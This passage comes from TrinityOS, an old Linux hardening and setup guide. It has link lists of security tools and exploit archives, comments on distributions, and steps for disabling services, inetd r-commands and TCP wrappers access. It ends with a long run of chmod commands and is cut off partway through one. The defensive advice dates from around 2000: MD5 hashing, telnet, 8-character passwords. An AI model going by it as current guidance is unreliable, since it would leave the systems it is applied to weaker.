http://www.xs4all.nl/~freeswan or http://www.flora.org/freeswan/ SWAN email list: http://www.xs4all.nl/~freeswan Overview http://www.cygnus.com/~gnu/swan.html Download the IPSec code from: Broken? Works ? or Other Mini-HOWTOs: https://www.seifried.org/articles/ipsec/ - IP logger ftp://ftp.tu-graz.ac.at/pub/linux/redhat-contrib/SRPMS/iplogger-0.1-1.src.rpm - Tuning: - IRQTune ftp://shell5.ba.best.com/pub/cae/irqtune.tgz - HDparm ftp://sunsite.unc.edu/pub/Linux/kernel/patches/diskdrives - Security Tools X - Nmap: http://www.insecure.org/nmap/ - COPS (old) ftp://ftp.freesoftware.com/pub/linux/sunsite/system/security/cops_104.tgz - Saint (new version of Satan) http://www.wwdsi.com/saint/ - SATAN (Old) Newer: ftp://ftp.porcupine.org/pub/security/index.html Older ftp://ftp.win.tue.nl/pub/security/satan.tar.Z - Solar buffer-overflow fixer ftp://ftp.huwig.de/pub/linux/mama/2.0/stack_noexec-symlink-security-fix.bz2 - Kurt Seifried's Linux Administrators Security Guide (LASG) https://www.seifried.org/lasg/ - Other URLs: Test Exploits: http://www-miaif.lip6.fr/willy/security/ Test Exploits: http://www.rootshell.org Test Exploits: http://www.l0pht.com Test Exploits: http://www.geek-girl.com Security Alerts: Subscribe to BugTraq at mailto://LISTSERV@NETSPACE.ORG More Security: http://www.ecst.csuchico.edu/~dranch/LINUX/index-linux.html#security http://www.ecst.csuchico.edu/~jtmurphy/ - Abacus Security Initiative Includes host_sentry, port_sentry and logchecker. http://www.psionic.com/abacus - SHADOW (SANS) http://www.nswc.navy.mil/ISSEC/CID/step.htm - Network Flight Recorder Setup HOWTO: http://www.nswc.navy.mil/ISSEC/CID/nfr.htm NFR software: http://www.nfr.net/download/ NFR ID Attack ID Packages: http://www.nswc.navy.mil/ISSEC/CID/nfr_id.tar.gz http://www.l0pht.com/NFR/ - WWW proxy (Apache or Squid) - WWW Ad banner filtering http://www-math.uni-paderborn.de/~axel/NoShit/index.html patch: http://www.america.com/~chrisf/web/NoShit/WebFilter_0.5.patch.gz Example filter: http://www.america.com/~chrisf/web/NoShit/library.txt - Zip drive http://www.torque.net/~campbell - Linux Applications: http://www.xnet.com/~blatura/linapps.shtml - Linux Games: X-Shipwars: http://fox.mit.edu/xsw/ - Linux Real Time messengers: http://www.portup.com/~gyandl/ ================================================================================ ================================================================================ Section 6 - Thoughts on Picking a Linux Distribution - Install Linux distribution (too complicated to be covered in TrinityOS) Here are a few comments that talk about what Linux distribution might be right for you. One thing I've been asked over and over is regarding users trying out Linux with an old Linux that was given to them. With the new 2.2.x kernel out, all new Linux distributions BLOW AWAY the old ones in terms of ease of setup, performance, hardware compatibility, etc. So, I recommend that you get a new copy a given Linux distribution and give that a look. And you can't tell me its expensive when you can get almost ANY Linux distribution for under $3.00 US a CD from places like http://www.cheapbytes.com. *------------------------------------------------------------------------------------------* * What do I use? I currently use Mandrake v6.1 but I'm worried about Mandrake's direction * *------------------------------------------------------------------------------------------* So, with that behind us, here is a few notes: Redhat: http://www.redhat.com Redhat, currently in its 6.2 version, is a modern Linux distribution that has a strong installation program and has some great system administration utilities too. One of the best parts of Redhat is its increamental RPM package installation and upgrade system. Another major reason for going with Redhat is its support for the new Glibc2 libraries. Redhat is constantly upgraded and is well supported in the Linux community. Redhat is a good choice for the Linux newbie that wants Linux running with all kinds functionality without a lot of work. It comes with everything from TELNET/FTP to Microsoft and Novell file server emulation. If you are already a UNIX snob, you might find Redhat's layout wierd (unless you are a Sun Solaris (SYSV) person - the /etc/rc.d/rc2.d layout is similar). *BUT*.. many people don't like Redhat. Why? 1. Redhat has a LOT of extra software built-in. Yes, you can choose the "Custom" installation process and get rid of most of the options (recommended) but a FULL install is 1.5+GB! 2. If you want to *learn* UNIX (not specifically Linux) in the classic LINUX step-by-step fashion and truely understand it (the hardest but BEST way (IMHO)), Redhat probably wouldn't be my first choice! Yet, I do have to admit my opinion is slowly changing though. 3. Redhat changes the entire behavior of how Linux is setup and configured compared to other distributions like Slackware to be more easy to use, modifible via scripts, etc. Unfortunately, Redhat's GUI tools don't easily tell you what it is going to do to your config files. If you want to learn UNIX in a classic fashion, go with Slackware or, to a lesser extent, Debian, SuSe, etc! Those distros are a LOT more plain and easier to initially figure out. Version 6.x has enhanced the installation program for easier use and they have updated almost ALL of the tools such as Apache, Samba, etc. Also, the ASCII, NCURSES, and X-Windows versions of the "linuxconf" and "control-panel" GUI interfaces are getting VERY cool! Mandrake: http://www.linux-mandrake.com Mandrake Linux, currently at version 7.0, is a close derivative of Redhat Linux with some changes and add-ons. The main difference between Mandrake and Redhat is that Mandrake is compiled for [ Pentium ] or newer machines. Redhat is currently compiled for Intel 386 (i386) processors. With the Pentium optimizations alone, Mandrake yeilds anywhere from a 10-20% performance increase over RedHat on new platforms. Next, Mandrake has been adding more customized tools to their distribution. With these tools, like the "Mandrake Updater", administration is easier. If you like GUI tools, Mandrake has them! One thing I do want to mention is that Mandrake 7.0's new installer called "Drak-X" has some *SERIOUS* problems. I won't go into deep details but both the Xwindows and Ncurses versions of Drak-X's partitioning utils failed to understand some simple partition layouts, etc. Not only that, it just doesn't give you the flexibility of installer methods like Redhat v6.2 does. BUT, it does give the user the option of different default security settings, etc. This is good but I'm very worried about the direction Mandrake is going. Enough said for now. Slackware: http://www.slackware.com Slackware, now at version 7.0 is one of the original Linux distributions and it is still one of my favorites. It definately isn't as slick in terms of installation or functionality compared to Redhat but it's layed out in a clear manor. Its INIT scripts (the scripts that are executed to bring the system up) are layed out in a very readable fashion (BSD-style) and everything is obvious (in the open). Slackware will be a comfortable fit for the UNIX guru peoples out there. Like Redhat, Slackware uses a software package system (pkg) for modularized system upgrades. Though it isn't as fancy as Redhat's RPM system.. it has almost all the same functionality. Though patches do come out for Slackware, Redhat's community usually has patches available FASTER. Debian: http://www.debian.org Though I haven't used Debian much, many people out there seem to like it a lot. It has been best described to me as as a distro that old Slackware users will LOVE that hate Redhat. Interestingly enough, Corel's distro and also Storm are based on Debian as well. Anyway, Debian doesn't include the kitchen sink in software like Redhat but it's layed out in a good mannor, has it's own RPM-like installation/upgrade system called dPKG (new version is called "apt"), and it does support the new Glibc2 library system. Like Redhat, Debian reported to be constantly updated and well supported. Many people argue that Debian is even better updated than Redhat though they are considerably slower to release new distros compared to the others. Caldera: http://www.calderasystems.com/ Caldera, now at v2.3, is the most commercial of all the Linux distros. They initially pulled ahead of the pack with a better installation program and auto-installing hardware modules but everyone caught up pretty quick. Caldera is understood to have the easiest installation program of ALL the distributions. Caldera differentiates itself by trying to meet the needs of the corporate market. For example, they have completed a port of Novell's NDS directory services to Linux. Pretty cool! SuSE: http://www.suse.com SuSE, currently in version 6.3, is a fairly new distribution from Germany. I had previously tried their 5.x version but there was so much embedded German text in it, it bothered me so I gave up on it. I recently installed version 6.0 and it seems much better. Its installation program is pretty good though I think Redhat's is somewhat better. But, SuSE has a nice configuration tool called YaST and they were one of the first to come with the KDE window manager. There are other Distributions out there to pick from depending on your hardware platform (Dec Alpha, Motorola PowerPC, etc) such as: TurboLinux - popular in Japan / BeoWolf clusters LinuxPPc http://www.linuxppc.org - for PowerPC machines LinuxPro http://www.wgs.com/ LinuxWare http://www.trans-am.com/ MkLinux http://www.mklinux.apple.com/ - For 680x0 and PPC Apples Stampede http://www.stampede.org/ You'll have to experiment and ask other Linux people what distribution they like and WHY! Personally, I'd recommend to get one of those multiple Distrobution CD sets from places like www.cheapbytes.com and try them out yourself!! For more Distribution details, check out: http://www.linux.org/dist/english.html http://metalab.unc.edu/LDP/HOWTO/Distribution-HOWTO.html http://www.linuxgazette.com/issue31/hughes.html ================================================================================ Section 7 - Installing a distribution, patching it, and doing a Search/Replace on TrinityOS Upgrading/Updating your Linux distro: Like ANY Linux distribution, bug fixes, security releases, etc are always coming out and you NEED to stay on top of it. Remember, Linux is very functional but without a given security patch, a hacker can break into your box and do ANYTHING! Redhat, Debian, Slackware, etc have their own incremental update systems that makes this easier. Ps. If the program you update to with "pkgadd" has different configuration file layouts, you will have to the conversion manually. Debian and Redhat's systems can do the conversion for you though I've had mixed results with this. Redhat users: Goto the Redhat Updates URL in [Section 5] and download all the recent patches to a directory (ie. /tmp/patches). Once you have all of the newest RPMs, you should use the "Fresh" option of the RPM tool. This will update the RPMs on your machine ONLY if an older version of the RPM is installed on your machine. So, I recommend thast you do: rpm -Fvh /tmp/patches/* Also, please heed these following warnings regarding RPMs: ****************************** ** Don't always trust RPMs!!!! ****************************** ** See [Section 50] for more specific instructions on how to use ** RPMs, see what files will be installed/replaced/OVERWRITTEN ** BEFORE you install them, etc ****************************** ** Staying on top of new RPMs ** ** You should also impliment the RPM notification tool that is documented ** in [Section 43] to stay on-top of this in the future! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ TrinityOS diagrams and Search and Replace Keys ---------------------------------------------- This is how the TrinityOS network is layed out: -- Network topology diagram: ________ / \ |Internet >------------------+ \________/ | Cablemodem | +-----------------------+ | | | | External Link: eth0 | | IP: 100.200.0.212 | _________ | DGW: 100.200.0.1 | / Various \ | | | Remote | | | | Sites >-ISDN--|- External Link: ppp0 | | & | | IP: dynamic | | Internet| | | | link | | ----------- | \ backup / | | --------- | Internal Link: eth1 | | IP: 192.168.0.1 | | | | +-----------------------+ | 8-port 10Mb/s hub | +----+----+----+----+----+----+----+----+ | | | | | | | | | PC PC PC PC PC PC PC PC PC #1 #2 #3 #4 #5 #6 #7 #8 #9 | | /----------------\ IP: 192.168.0.2 DGW: 192.168.0.1 DNS: 192.168.0.1 -- ============================================================================================== - Next, this section is to custom taylor your copy of TrinityOS to your specific enviroment. Do a search/replace on the "Search for" fields and replace them with your correct "replace with" fields. -------------------------------------------------------------------------------------- PLEASE NOTE: If you are going to use IP Masquerading, you should use one of the private address spaces as described in RFC 1918 such as: Class-A: 10.x.x.x Class-B: 172.16-31.x.x Class-C: 192.168.x.x -------------------------------------------------------------------------------------- search for replace with (given as an example) ---------- ---------------------------------- Your main login ID johndoe your-login Your PPP ISP name your-ppp-isp-name your-ppp-isp-name Your PPP ISP # 555-1212 555-1234 Your PPP login your-ppp-login your-ppp-login Your PPP password your-ppp-passwd your-ppp-passwd Your Linux box's name roadrunner your-linux-boxes-name Domain Name acme123.com yourdomain.org Internal IP network 192.168.0.0 192.168.0.0 Internal IP address 192.168.0.10 192.168.0.10 Internal gateway IP 192.168.0.1 192.168.0.1 Internal broadcast IP 192.168.0.255 192.168.0.255 External IP network 100.200.0.0 100.201.0.0 External IP address 100.200.0.212 100.201.0.212 External gateway IP 100.200.0.1 100.201.0.1 External broadcast IP 100.200.0.255 100.201.0.255 Remote SECONDARY DNS ns.backupacme.com ns.yourdomain.org External secondary DNS 102.200.0.25 102.201.0.25 Reverse DNS lookup 54.44.80.10 50.0.201.102 Explict allowed IP#1 200.211.0.40 200.244.0.40 Explict allowed IP#2 200.211.0.41 200.244.0.41 Explict allowed IP#3 200.211.0.42 200.244.0.42 Explict allowed IP#4 200.211.0.43 200.244.0.43 ISP DNS server #1: 10.200.200.69 10.222.222.44 ISP DNS server #2: 10.200.200.96 10.222.222.88 Your SMB Workgroup: ACME123 your-linux-boxes-SMB-workgroup-name Your pager email: 1234567@skytel.com 2321432342@skytel.com A internal PORTFWed MASQ machine name: coyote one-internal-MASQed-machine-name A internal PORTFWed MASQ machine IP: 192.168.0.20 192.168.0.20 Internal machines allowed to connect to the MASQ server: 192.168.0.11 192.168.0.11 192.168.0.12 192.168.0.12 ============================================================================================== ################################################################################## ## ## ## Fixing Redhat, Mandrake, etc (bugs) that are right out of the BOX! (ouch!): ## ## ## ################################################################################## * These are errors, bugs, anoyances, etc that I've notice in Redhat5.x. But, these might be fixed in later CD releases, patches, etc. ------------------------------------------------------------------------------ All of TrinityOS's step-by-step instructions, files, and scripts are fully scripted out for an automatic installation at: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-files/TrinityOS-security.tgz ----------------------------------------------------------------------------- - Fix all cron permissions (some fixed in RH6.x) - chmod -R 750 /etc/cron.hourly - chmod -R 750 /etc/cron.hourly/* - chmod -R 750 /etc/cron.daily - chmod -R 750 /etc/cron.daily/* - chmod -R 750 /etc/cron.weekly - chmod -R 750 /etc/cron.weekly/* - chmod -R 750 /etc/cron.monthly - chmod -R 750 /etc/cron.monthly/* - Let Minicom and "ls" run in Color: - Edit /etc/profile and add: - Add the following after the "export" line if you have Minicom installed: MINICOM="-c on" export MINICOM - This is fixed in RH6.x but its good to setup regardless. Edit the /etc/bashrc file and add: alias ls='ls --color=yes' - Fix the timezone NOTE: This is supposed to be already fixed in a Glibc RPM fix - Edit the /etc/profile file Just above the "EXPORT PATH" line, add the line for Pacific Daylight time (adjust for your Time zone) TZ=PST8PDT Now edit the "EXPORT PATH" line and append the word "TZ" - Change the default UMASK (default file/directory create) NOTE: Changing this behavior makes the permissions of all NEWLY created files only readable by certain users and groups. This can have a detremental effect on programs that need to be used by multiple users. The default is "umask 002 else umask 022". NOTE2: If you see two "umask" lines, change them BOTH to 027 - edit /etc/profile, find the umask line(s) and make them it read "umask 027" - Fix compressed FTP downloads (still broken in RH6.1) NOTE: The changes were: - "compress" is in /usr/bin and NOT /bin NOTE-2: I had previously patched TAR to understand .BZ2 compression but this is now already done in RH6.x and most other modern Linux distrobutions (the man pages don't reflect this. Obviously this is STILL a bug as of Mandrake 7.0.). If you have an old distribution, compile up the new tar executale. Then put this new TAR binary in /usr/local/bin. - Create a link to the new tar file ln -s /usr/local/bin/tar /bin/tar Now, to fix FTP so you can get compressed archives automatically from ftpd, edit the following file and make it look like this: /etc/ftpconversions -- :.Z: : :/usr/bin/compress -d -c %s:T_REG|T_ASCII:O_UNCOMPRESS:UNCOMPRESS : : :.Z:/usr/bin/compress -c %s:T_REG:O_COMPRESS:COMPRESS :.gz: : :/bin/gzip -cd %s:T_REG|T_ASCII:O_UNCOMPRESS:GUNZIP : : :.gz:/bin/gzip -9 -c %s:T_REG:O_COMPRESS:GZIP : : :.tar:/bin/tar -c -f - %s:T_REG|T_DIR:O_TAR:TAR : : :.tar.Z:/bin/tar -c -Z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+COMPRESS : : :.tar.gz:/bin/tar -c -z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+GZIP -- - Fix the permissions on the /etc/rc.d/init.d script files!!! Bad.. Bad.. Bad.. Only "root" and admin groups should be able to do this type of adminstration. chmod -R 770 /etc/rc.d/init.d/* ================================================================================ Section 8 - Initial System security [CMOS setups, disable ports, TCP wrappers, shadow passwds, etc] First thing, I would recommend to do in addition to following TrinityOS for your needed purposes, read LDP's Security HOWTO for a more detailed explination of what to do. Interestingly enough, I never read it until recently and a LOT of things I had independantly recommend was already in the Security HOWTO too! So.. it sounds like we are on-track! I recommend you read it too! The URL is in Section 5. - Upon system boot, enter into the CMOS setup - AMI BIOSes use the DEL key - Compaq BIOSes use the F10 key - some Pheonix BIOSes use Control-Escape - Once you are in the BIOS, search around and try to set the following: + Enabled the BIOS password - I recommend the combination of upper and lower case characters with numbers! + DISABLE booting from the floppy drive by changing the BIOS boot order from A:,C: to C:,A: + If you are extra paranoid, you can set the floppy drive to READ only or even disable the floppy drive all together if you wish. - Now, boot back into Linux and make sure you have a password for the root login - "passwd root" NOTE: You may not have noticed this but most Linux distributions only took the first -8- characters of your password. After that, they simply ignore ALL other passwords. For example, these two passwords are the SAME to Linux: Pl3a5eGet0ut and Pl3a5eGe Because of this, you need a strong password and it can ONLY be 8-characters long. You REALLY should use a combination of Upper and lower case characters, numbers, and special characters such as: [ `~!@#$%^&*()-_=+{[]}\|'";:,<.>/? ] Fortunately enough, the newer Linux distributions have fixed this issue. But regardless if this has been fixed on your distro or not, it IS important that you choose a strong passwd. - Enable the "sticky" bit in /tmp so only the file's owner can delete a given file in /tmp (Fixed in RH6.x): chmod 1777 /tmp - Disable the Control-Alt-Delete keyboard shutdown command - This is pretty important if you don't have the best physical security on the box: - Do do this, edit /etc/inittab and change the line: ca::ctrlaltdel:/sbin/shutdown -t3 -r now to #ca::ctrlaltdel:/sbin/shutdown -t3 -r now - Now, for the system to understand the change, type in the following at a prompt /sbin/init q - Compile / install vlock (available in most modern distributions). NOTE: Use this command if you are logged in as root and want to LOCK the ttys without having to log fully out and back in again. Nice! - Change what system daemons get loaded by editing the folowing files in "/etc/rc.d/" ----------------------------------------------------------------- NOTE: Regardless of Linux distro, you might want to SKIP some of the following steps if you plan to run: - Samba (smb) - Printing (lpd) - Mail (Sendmail), - NFS etc. ----------------------------------------------------------------- Redhat: (though this is specific to Redhat, the following is a good read for ALL Linux users.) -- The way that Redhat boots is the SysV way. This is where the OS will execute ALL files for a given runlevel (see definition below) that start with a "S" (that's a CAPITAL "S") and have a number after that in a numerical orfer from lowest to highest. For example, it will run "S10network" before it runs "S30syslog". So what's a RUN-level? A run-level is the mode that the machine will load various system programs. Though this varies from Unix to Unix (Linux, Solaris, AIX, HP-UX, etc)... they are similar. For Linux, this is the run-levels (from /etc/inittab): 0: halt (stops the OS and sometimes shuts the power off) 1: single user (doesn't bring up the network, no passwd for root. Needed for system problems, lost root passwds, etc) 2: Multiuser (Brings up the whole OS but doesn't mount remote file systems (NFS, CODA, etc) 3: Full Multiuser (Brings up the whole OS with any remote file systems) 4: Unused 5: X-windows (Brings up the system immeadiately into X-windows) 6: Reboot (reboots the machine; usually into a COLD boot state [counts all the RAM, etc]) Also, if you didn't already notice, all of the files in various runlevel directories like /etc/rc.d/rc0, 1, 2, 3, 4, 5, 6.d are actually just symbolic links to all the real script files in /etc/rc.d/init.d! This makes things more managable. So.. since Linux usually runs in multi-user / non-Xwindows mode, that means runlevel "3" will execute all files in the /etc/rc.d/rc3.d directory. Then.. the system will begin to run ALL files starting with "S" in order. When you shutdown or restart the machine, you change the machine into runlevel "0" or "1". This will first execute all commands from the initial runlevel directory of "3" starting with "K". If the given process isn't already running, like my example for LPD, it will just skip it and move on. Get it? -- Slackware: -- The way that Slackware boots is the BSD way. It will execute the /etc/rc.d/rc.inet1 (network interfaces) file first. Then, it will run the /etc/rc.d/rc.inet2 (network services) file. This is much more readable than the Redhat method but its harder to maintain (IMHO). -- Securing your machine by limiting what daemons load: ---------------------------------------------------- BSD-Style: Edit the following files in /etc/rc.d/ and make these changes unless --------- you need that service. - rc.M (disable email and WWW servers) - line 75: #'d out all lines for Sendmail - line 97: #'d out all lines for httpd - rc.inet2 (disable SERVER and NFS servers) - line 14: #'d out all lines for lpd - line 15: #'d out all lines for lpd - line 31: #'d out all lines for portmap - line 72: #'d out all lines for mountd, nfsd, pcnfsd, bwnfsd There are at least (5) ways to turn on/off what daemons load: Via A GUI interface: -------------------- This process manipulation can be done either via: - "chkconfig" command line utility - "ntsysv" Ncurses GUI utility - "tksysv" Xwindows GUI utility - "control-panel" or "linuxconf" Xwindows GUIs. Note - Though I'm a command line bigot, I feel the "ntsysv" GUI is the fastest way to modify these options! NOTE #2 - I've found that when you first run these GUI tools, they will default to running and disabling some processes they SHOULDN'T! So, be careful and make sure that the tool is starting/stopping the correct daemons. Confirm this by going into the correct runlevel directory, say /etc/rc.d/rc3.d, and making sure only the minimal S* files are there. With "chkconfig": Please note that there might be some daemons that are missing and/or extra in your specific /etc/rc.d/init.d directory so make sure you enable/disable the appropreiate ones for your needs. -- #Disable automounters chkconfig --level 2345 amd off #Disable unless this is a laptop chkconfig --level 2345 apmd off #Disable unless you want to run batch programs within certain loads chkconfig --level 2345 atd off #Disable unless you want emails of EVERY ARP on your network segment chkconfig --level 2345 arpwatch off #Disable unless you want boot diskless workstations chkconfig --level 2345 bootparamd off #Disable unless this machine will be a DHCP *SERVER* chkconfig --level 2345 dhcpd off #Disable unless this machine will be a full blown router chkconfig --level 2345 gated off #Disable unless this machine will be a WWW server chkconfig --level 2345 httpd off #Disable unless this machine uses a modularized kernel # NOTE: Not needed for 2.2.x+ kernels chkconfig --level 2345 kerneld off #Disable unless you really want to configure remote machines via Linuxconf chkconfig --level 2345 linuxconf off #Disable unless this machine will be a print server #(for the local or remote machine) chkconfig --level 2345 lpd off #Disable unless you really need the proprietary MC server chkconfig --level 2345 mcserv off #Disable unless this machine will be a database server chkconfig --level 2345 mysql off #Disable unless this machine will be a caching or full blown DNS server chkconfig --level 2345 named off #Disable unless this machine will be a NFS server chkconfig --level 2345 nfs off #Disable unless this machine is a laptop or the PC has PCMCIA cards chkconfig --level 2345 pcmcia off #Disable unless this machine will be an NFS server or needs RPC tools chkconfig --level 2345 portmap off #Disable all R-cmds chkconfig --level 2345 rusersd off chkconfig --level 2345 rwalld off chkconfig --level 2345 rwhod off #Disable unless this machine is a email server chkconfig --level 345 sendmail off #Disable unless this machine is a Samba (MS File&Print) server chkconfig --level 345 smb off #Disable unless this machine is to support SNMP chkconfig --level 2345 snmpd off #Disable unless this machine is a local/remote HTTP proxy server chkconfig --level 2345 squid off #Disable unless this machine will be running X-windows chkconfig --level 2345 xfs off #Disable unless this machine will be an NTP server chkconfig --level 2345 xntpd off #Disable unless this machine will be part of a NIS/YP domain chkconfig --level 2345 ypbind off chkconfig --level 2345 yppasswdd off #Disable unless this machine will be a NIS/YP server chkconfig --level 2345 ypserv off Manually: --------- NOTE: only do this to the processes you WON'T use. NOTE #2: If, for some reason, any of the K or S* files don't exist and you want them to be there, use one of the GUI tools above. Do this in /etc/rc.d/rc2.d, /etc/rc.d/rc3.d, and /etc/rc.d/rc5.d - mv S08autofs K08autofs - mv S20nfs K20nfs (unless this is for a full or caching NFS server) - mv S20rusersd K20rusersd - mv S20rwalld K20rwalld - mv S20rwhod K20rwhod - mv S30mcserv K30mcserv - mv S98kerneld K98kerneld - mv S35smb K35smb (unless this is for a Samba F&P server) - mv S60lpd K60lpd (unless this is for a print server) - mv S65portmap K65portmap (unless this is for a NFS server) - mv S95nfsfs K95nfsfs (unless this is for a NFS server) - mv S45pcmcia K45pcmcia (unless this for a laptop) - mv S65dhcpd K65dhcpd (unless this is for a DHCP server) - mv S85httpd K85httpd (unless this is for a WWW server) - mv S80sendmail K80sendmail (unless this is for a mail server) ========= Shutting down most of inetd.conf ============= Inetd, called the "super server", will load a network program based upon a request from the network. I personally recommend that any program that you DON'T need shouldn't be able to load. * The exceptions that I leave in and secure via a firewall and * TCPwrappers are: * * TELNET, FTP, SSH, and sometimes TALK, POP-3, IMAP, and FINGER. * * See below.. I recommend to edit the /etc/inetd.conf file and place a "#" in front of the lines to disable them (if not already done). echo - basic network functions that AREN'T needed discard - " chargen - " daytime - For checking the date remotely (or) time - " shell - Remote Shell.. flexible but VERY insecure. A part of the R-command tools login - " exec - " comsat - Email box monitoring server (very old) talk - UNIX Talk (I usually allow this but secure it via the firewall/tcp-wrappers ntalk - " dtalk - " pop-2 - For checking email. Use POP3 instead. uucp - For sending/receiving email the OLD way. tftp - For simple file transfers (unless you need this functionality) bootps - For simple configuration transfer (very old; replaced by DHCP) cfingerd - For probing information on a specific user or who is logged in systat - For probing information about the system itself netstat - For probing information about the system's network auth - For the ident system to see what user is creating specific network traffic linuxconf - For remotely configuring the system via the Linuxconf GUI swat - For remotely configuring the Apache WWW server via Swat Ones you can optionally disable if you don't need them are (many you want to leave available until you install a secure alternative like SSH): ftp - For insecure file transfer telnet - For insecure remote logins talk - For accepting local/remote real-time talk sessions ntalk - " dtalk - " pop-3 - For downloading email. imap - For checking email on the server. finger - For checking out info on system users (most people should disable this) cfinger - " ***** NOTE: If you need to run finger, change the word "root" to "nobody". ***** Once you make these changes, finish editing the file. To make the change take effect, type in: kill -HUP `ps aux | grep inetd | grep -v -e grep | awk '{print $2}'` =========TCP wrapper security========= - Edit "/etc/hosts.deny" and insert the following at the end of the file: ALL: ALL - edit "/etc/host.allow" and insert lines at the end of the file for each IP and or Domain that you want to allow access to the Linux box. ----- NOTE: Do NOT use DNS names for the hosts as DNS can be spoofed. Use TCP/IP addresses instead. ----- ALL: 127.0.0.1 #Needed for some local services like comsat ALL: 200.211.0.40 #Securehost ALL: w.x.y.z For example: ALL: 192.168.0.2 #Allow everything from coyote2 ALL: 200.211.0.40 #Allow all traffic from Explict Allowed #1 ALLL 200.211.1. #Allow *ALL* traffic from all hosts on the 200.211.1.x #network. Yes, the option should END with a single "." Or if you want to be more granular, you can do the following. All TCP wrapper supported daemons that you can put in here are noted in the /etc/inetd.conf file. in.ftpd: 192.168.0.2 #Allow only FTP traffic from coyote2 in.pop3d: 200.211.0.40 #All only pop-3 traffuc from Explict Allowed #1 =========FTP Anonymous users========= Disable anonymous FTP to your box by editing /etc/ftpaccess and make the common first line that looks like: class all real,guest,anonymous * to this (notice the words "guest" and "anonymous" is gone: class all real * =========Shadow Passwords========= Slackware 3.x ------------- Slackware v3.2 did not come with Shadow passwords enabled but v3.4+ does. For several reasons, I recommend that you just upgrade to Slackware v3.4 if you are running an older Slackware distribution. The upgrade will fix numerious security issues and has many other features as well. Redhat ------ Redhat5, out of the box, does NOT do shadow passwords (stupid) but it is fixed in RH 6.1 and onward. Confirm that your system is using SHADOW passwords by looking at the /etc/passwd file and make sure that the second left-hand field next to the username is a ":x:". If so, make sure everthing in this section is setup the same on your box. If it isn't do the following: - login as root - type in "pwconv" - This will convert the /etc/passwd file and move the encrypted passwords over to /etc/shadow and change the encryption algorithm from the weak "crypt" system to "md5" - More info is available in "/usr/doc/pam-0.64/txts/pam.txt" - NOTE: Using passwords more than 8 characters will NOT work. Use larger passwords and prepare NOT to be able to login again! - Edit the /etc/pam.d/passwd file and change the bottom lines NOTE: There are (2) methods shown below. Crypt is the OLD UNIX method and is considered weak. The newer method uses MD5 hashing. I recommend the MD5 method. So, edit the file and change it to the following: For MD5 hashing (more secure and recommended): -- auth required /lib/security/pam_pwdb.so shadow nullok account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so retry=3 password required /lib/security/pam_pwdb.so shadow use_authtok nullok md5 -- For normal CRYPT hashing: -- auth required /lib/security/pam_pwdb.so shadow nullok account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so retry=3 password required /lib/security/pam_pwdb.so shadow use_authtok nullok -- ========= Disable ROOT TELNET/SSH access ======== By default, most Linux distributions don't allow direct "root" logins via TELNET or SSH. This is considered good security. - If you DO need to login via telnet as root then edit or create the /etc/securetty file and ADD: ttyp0 ttyp1 ttyp2 **** MAKE SURE YOU PUT "#"s IN FRONT OF THESE NEW LINES ONCE YOU ARE DONE! **** ========= Disable ROOT FTP access ========= It seems that some Linux distributions do not come with the /etc/ftpusers file. This file basically is for when any usernames in this file, they are NOT allowed to FTP in. Usually, it is considered POOR security to be able to FTP in as ROOT. By putting the word "root" into this file, this disables FTP logins from "root". - If you ever need to FTP into the linux box as ROOT (you shouldn't be able to by default), edit the "/etc/ftpusers" file and put a "#" in front of "root". NOTE: If the /etc/ftpusers file DOESN'T already exist, just create it. Once you are done, LEAVE it there with at least the line "root" without a "#" in front of it. ********************************************************* **** MAKE SURE YOU REMOVE THIS "#" ONCE YOU ARE DONE **** **** SINCE THIS IS A BIG SECURITY ISSUE **** ********************************************************* ========= Disable misc cron stuff ========== * When users install Redhat, they usually install more programs than they plan to initially use. Though Redhat allows users to later choose what daemons are and are NOT run upon boot, this does NOT disable some things that are loaded into the cron file. Redhat users: **NOTE**: DON'T disable: logrotate, tmpwatch, updatebd.cron, makewhatis.cron - Look in the /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, and /etc/cron.monthly and make sure that nothing is installed that you don't want. For example, I had to do the following for RH 5.2: mkdir -m 700 /etc/cron.disabled mkdir -m 700 /etc/cron.disabled/cron.hourly mkdir -m 700 /etc/cron.disabled/cron.daily mv /etc/cron.hourly/inn-cron-nntpsend /etc/cron.disabled/cron.hourly mv /etc/cron.daily/inn-cron-expire /etc/cron.disabled/cron.daily mv /etc/cron.daily/inn-cron-rnews /etc/cron.disabled/cron.daily mv /etc/cron.daily/tetex.cron/etc/cron.disabled/cron.daily Slackware Users: **NOTE**: DON'T disable: updatebd.cron - Realistically, you won't have the same issues as Redhat users because Slackware doesn't have as many bells and whistles as RH does. BUT.. check to make sure. All of Slackware's cron configuration is stored here. less /var/spool/cron/crontabs/root ========= File Permission corrections ========== A lot of the default file permissions on Linux distributions just give away too much information to the enduser or hacker. Some people might think that some of these are paranoid but I rather be safe than sorry: NOTE: most of these permissions reflect Redhat 5.2 but most will apply to any Linux distribution. NOTE2: If you receive any ERRORs when appling these changes, don't worry. That just means you don't have that package installed. # Files in /bin echo "Bru is a commercial backup program but some Linux distros come with it" chmod 750 /bin/bru chmod 750 /bin/linuxconf chmod 750 /bin/mount chmod 750 /bin/mt chmod 750 /bin/rpm chmod 750 /bin/setserial chmod 750 /bin/umount # Files in /sbin chmod 750 /sbin/accton chmod 750 /sbin/badblocks chmod 750 /sbin/ctrlaltdel chmod 750 /sbin/chkconfig chmod 750 /sbin/chkraid chmod 750 /sbin/debugfs chmod 750 /sbin/depmod chmod 750 /sbin/dhcpcd chmod 750 /sbin/dump* chmod 750 /sbin/fdisk chmod 750 /sbin/fsck* chmod 750 /sbin/ftl* chmod 750 /sbin/getty chmod 750 /sbin/halt chmod 750 /sbin/hdparm chmod 750 /sbin/hwclock chmod 750 /sbin/ide_info chmod 750 /sbin/if* chmod 750 /sbin/init chmod 750 /sbin/insmod echo "IPFWADM is only installed for v2.0 kernels" chmod 750 /sbin/ipfwadm chmod 750 /sbin/ipx* chmod 750 /sbin/isapnp chmod 750 /sbin/kerneld chmod 750 /sbin/killall* echo "This is the new location for klogd. Please disregard any errors if this doesn't work." chmod 750 /sbin/klogd chmod 750 /sbin/lilo chmod 750 /sbin/mgetty chmod 750 /sbin/mingetty chmod 750 /sbin/mk* chmod 750 